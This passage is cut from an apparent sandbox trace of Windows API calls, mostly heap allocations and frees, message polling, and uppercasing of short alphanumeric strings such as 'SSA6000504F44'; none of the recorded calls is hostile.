hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0190.427] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0190.428] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0190.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbeb2) returned 0x24d7a58 [0190.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbeb2) returned 0x34b2250 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0190.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.432] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.432] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.436] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.436] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.436] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.436] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.436] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.436] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.436] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.437] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.437] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.437] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.438] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.438] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.438] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.438] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.439] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.439] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.439] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.440] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.440] CharUpperBuffW (in: lpsz="SSA5000A03A10", 